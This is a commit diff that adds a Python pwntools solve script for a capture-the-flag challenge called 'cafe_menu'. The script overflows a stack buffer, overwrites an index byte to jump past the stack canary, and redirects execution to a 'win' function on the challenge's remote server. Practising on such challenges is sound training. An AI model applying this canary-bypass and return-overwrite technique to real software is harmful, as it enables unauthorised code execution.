Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/canary/05_cafe_menu/solve.py
+++ b/canary/05_cafe_menu/solve.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./cafe_menu", checksec=False)
+
+BUF_LEN = 48
+# CANARY_OFF = 50
+AFTER_CANARY = 0x3F
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13563)
+print(p.recvline())
+# We can overwrite IDX to make it write on the stack after the canary position
+payload = flat(
+    b"A" * 48,
+    b"\x3f",  # After canary offset found
+    b"A" * 8,  # Skip rbp
+    p64(0x401262),  # win
+    b"\xff",
+)
+p.send(payload)
+print(p.recvline())
+p.interactive()